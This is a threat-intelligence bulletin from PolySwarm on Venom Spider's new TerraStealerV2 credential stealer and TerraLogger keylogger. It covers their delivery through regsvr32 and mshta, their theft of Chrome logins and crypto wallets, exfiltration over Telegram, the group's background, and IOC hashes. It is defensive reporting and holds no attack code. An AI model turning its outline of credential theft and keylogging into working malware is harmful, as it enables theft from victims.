The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Venom Spider Using New TerraStealerV2 and TerraLogger Malware

May 9, 2025 2:17:08 PM / by The Hivemind

VENOMSPIDERRelated Families: VenomLNK, TerraLoader, TerraStealer, TerraTV, TerraCrypt, TerraRecon, TerraWiper, lite_more_eggs, RevC2, Venom Loader

Executive Summary

TerraStealerV2 and TerraLogger are two new malware families from Venom Spider, enhancing their Malware-as-a-Service (MaaS) platform with credential theft and keylogging capabilities. These tools, observed between January and April 2025, indicate active development but lack the sophistication of mature Venom Spider malware.

Key Takeaways

  • TerraStealerV2 targets browser credentials and cryptocurrency wallets, exfiltrating data via Telegram.
  • TerraLogger introduces keylogging to Venom Spider’s arsenal, using a low-level keyboard hook..
  • Distribution of TerraStealerV2 leverages multiple formats and trusted Windows utilities like regsvr32.exe and mshta.exe to evade detection.
  • Both malware families are under active development, with TerraLogger showing incremental updates and TerraStealerV2 deployed in varied campaigns.

TerraStealerV2 and TerraLogger

Venom Spider, a financially motivated threat actor, has expanded its Malware-as-a-Service (MaaS) ecosystem with two new malware families: TerraStealerV2 and TerraLogger. Identified between January and April 2025, these tools underscore the group’s ongoing focus on credential theft and user activity monitoring. While Venom Spider has a history of deploying stealthy malware through social engineering, these new families appear less polished, suggesting they are still evolving. Recorded Future’s Insikt Group reported on this activity.

TerraStealerV2 is a stealer designed to harvest browser credentials, cryptocurrency wallet data, and browser extension information. It targets Chrome’s “Login Data” database, copying it to `C:\ProgramData\Temp\LoginData` and extracting credentials using a statically linked SQLite library. The malware employs an SQL query to retrieve origin URLs, usernames, and passwords but cannot decrypt credentials protected by Chrome’s Application Bound Encryption (ABE), a security feature introduced in July 2024. This limitation indicates either outdated code or ongoing development. Data is exfiltrated to a Telegram channel and a secondary C2 endpoint. The stealer is delivered as an OCX file, executed via `regsvr32.exe`, and employs anti-analysis checks, such as verifying the file extension and execution context. Distribution methods include MSI, DLL, LNK, and EXE files, often retrieved from the C2 using curl or PowerShell. Ten distinct samples were observed, with some overlapping with ClickFix campaign tactics, such as using `mshta.exe` to execute payloads disguised as MP4 files.

TerraLogger marks Venom Spider’s first observed keylogging capability. Operating as a standalone module, it uses a low-level keyboard hook via `SetWindowsHookExA` to capture keystrokes, logging them to files like `a.txt` or `save.txt` in `C:\ProgramData`. The keylogger handles special characters and Shift key states, writing logs with window titles and keystrokes in formats like `<KEY-[keycode]>` or pipe-delimited abbreviations (`|bck|`). Five samples were identified, with compilation timestamps from January to April 2025, showing minor updates in log file paths and special key representations. Like TerraStealerV2, it is delivered as an OCX file executed via `regsvr32.exe`, but it lacks exfiltration or C2 capabilities, suggesting it is either in early development or designed as a modular component.

Both malware families leverage trusted Windows utilities, such as `regsvr32.exe` and `mshta.exe`, to evade detection, aligning with Venom Spider’s preference for low-friction deployment. The use of Telegram and `wetransfers[.]io` for C2 reflects a strategy of blending malicious traffic with legitimate services. However, their current limitations indicate immaturity compared to established tools like TerraLoader or VenomLNK. Venom Spider’s history suggests these capabilities will evolve, likely incorporating improved evasion and data collection techniques. As Venom Spider refines these tools, their integration into broader MaaS campaigns could amplify their impact, particularly for high-value targets.

Who is Venom Spider?

Venom Spider, also known as Golden Chickens and TA4557, is a financially motivated cybercriminal group operating primarily out of Russia. Active since at least 2012, Venom Spider develops and distributes sophisticated malware toolsets, including SKID, VenomKit, Taurus Loader, and the notorious More_eggs backdoor. Their tactics, techniques, and procedures (TTPs) include deploying spear-phishing campaigns targeting human resources departments with malicious resumes to deliver More_eggs, which collects system information and communicates with command-and-control servers. They employ server-side polymorphism to evade detection, using obfuscated JavaScript and time-delayed execution to bypass sandboxing. The group also limits the distribution of its malware to trusted affiliates, collaborating with other criminal actors like COBALT SPIDER, WIZARD SPIDER, and PINCHY SPIDER.

Venom Spider primarily targets organizations in North America and Europe, with recent campaigns focusing on e-commerce, human resources, and corporate recruiting sectors. Notable activities include phishing schemes exploiting job seekers to infect HR systems, observed as recently as April 2025. There is no definitive evidence linking Venom Spider to a specific nation-state military or intelligence entity, such as the KGB or FSB, though their operations align with Russia's broader cybercriminal ecosystem.

IOCs

PolySwarm has multiple samples associated with this activity. 

 

14d9d56bc4c17a971a9d69b41a4663ab7eb2ca5b52d860f9613823101f072c31

1ed9368d5ac629fa2e7e81516e4520f02eb970d010d3087e902cd4f2e35b1752

313203cb71acd29e6cc542bf57f0e90ce9e9456e2483a20418c8f17b7afe0b57

4b6fa036aceb1e2149848ff46c4e1a6a89eee3b7d59769634ce9127fdaa96234

766690a09ec97e414e732d16b99b19389a91835abc15684cc0f1aba2ca93cf98

77be5500892fee02b79e58782dbb213e952d2c4badbb2ab862f3f4d304ec9b4e

9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a

de6ed44d21e5bc9bc5c1c51f33760a5d96378308d02c2c81ef2d75e7a201fb63

93ca6b9ead4c853264050163a3748079031fe41dd7b5d82d2849ab22de0ee0b4

 

You can use the following CLI command to search for all TerraStealerV2 samples in our portal:

$ polyswarm link list -f TerraStealerV2

 

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.

 

Topics: Threat Bulletin, Evolving Threat, TerraStealerV2, TerraLogger, Venom Spider

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts

Join the Marketplace

For Enterprises and Businesses

Learn More

For Security Experts and AV Companies

Learn More